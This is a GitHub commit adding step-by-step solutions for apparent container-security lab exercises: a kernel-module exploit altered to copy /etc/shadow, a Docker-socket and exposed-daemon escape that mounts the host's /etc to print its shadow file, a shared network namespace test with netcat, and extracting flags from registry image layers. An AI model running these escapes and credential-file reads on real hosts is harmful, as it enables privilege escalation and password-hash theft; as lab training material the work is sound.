-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Mohit Gupta
committed
Oct 18, 2019
1 parent
0e70ea7
commit 6879fc0
Showing
5 changed files
with
92 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,24 @@ | ||
| 1) Get the container id for the kernel container so we can add files: | ||
|
|
||
| docker ps | grep kernel | ||
|
|
||
| The container id will be the first field | ||
|
|
||
| 2) Tweak exploit.c by replacing '/bin/echo foo > /bar' with '/bin/cp /etc/shadow /tmp/' | ||
|
|
||
| 3) Copy over exploit.c and Makefile to the container | ||
|
|
||
| docker cp exploit.c <container id>:/ | ||
| docker cp Makefile <container id>:/ | ||
|
|
||
| 4) Exec into the container | ||
|
|
||
| docker-compose exec kernel bash | ||
|
|
||
| 5) Compile module | ||
|
|
||
| make | ||
|
|
||
| 6) Load module | ||
|
|
||
| insmod exploit.ko |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,19 @@ | ||
| 1) Exec into the backdoor container | ||
|
|
||
| docker-compose exec backdoor sh | ||
|
|
||
| 2) Access the daemon within the UNIX socket in / and list running containers | ||
|
|
||
| docker -H unix:///docker.sock ps | ||
|
|
||
| 3) Obtain the IP address of the containers gateway (the host) | ||
|
|
||
| route -n | ||
|
|
||
| 4) Access the daemon through the host on TCP 2375 | ||
|
|
||
| docker -H tcp://<host ip>:2375 ps | ||
|
|
||
| 5) Print /etc/shadow from the host | ||
|
|
||
| docker -H unix:///docker.sock run --rm -v /etc:/host/ ubuntu cat /host/shadow |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,21 @@ | ||
| 1) Spawn an initial container | ||
|
|
||
| docker run --rm -ti skybound/net-utils bash | ||
|
|
||
| 2) In a _separate_ terminal, obtain the container id of the container created within step 1 | ||
|
|
||
| docker ps | ||
|
|
||
| 3) Spawn a second container that attaches onto the network stack of the first container | ||
|
|
||
| docker run --rm -ti --net container:<container id> skybound/net-utils bash | ||
|
|
||
| 4) Spawn a netcat listener in the first container | ||
|
|
||
| nc -nlvp 8080 | ||
|
|
||
| 5) Connect to the listening netcat from the second container | ||
|
|
||
| nc -v localhost 8080 | ||
|
|
||
| 6) Type random gibberish and press enter in both terminals, and validate the data appears in the other terminal |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,28 @@ | ||
| 1) List available tags | ||
|
|
||
| reg ls -f localhost:5000 | ||
|
|
||
| 2) Obtain the manifest of the first image and get the digest of the config | ||
|
|
||
| reg manifest -f localhost:5000/supersecretimage:v1 | ||
|
|
||
| 3) Download the config and observe that a file was added to /lib/udev/docker.txt within the last layer | ||
|
|
||
| reg layer -f localhost:5000/supersecretimage@<config digest from manifest> | jq | ||
|
|
||
| 4) Get the digest of the bottom layer from the manifest | ||
|
|
||
| 5) Download the bottom layer | ||
|
|
||
| reg layer -f localhost:5000/supersecretimage@<layer digest from manifest> > layer.tar.gz | ||
|
|
||
| 6) Extract layer and cat lib/udev/docker.txt | ||
|
|
||
| tar zxvf layer.tar.gz && cat lib/udev/docker.txt | ||
|
|
||
|
|
||
| 7) For the second image, the same steps can be followed to get to the config which contains the flag | ||
|
|
||
| 8) For the final flag, the config shows a file was added in the second to last layer and then deleted in the final, as such obtain the digest of the second from bottom layer from the manifest | ||
|
|
||
| 9) Download the layer as before, extract and view the contents of bin/something.txt |
Binary file not shown.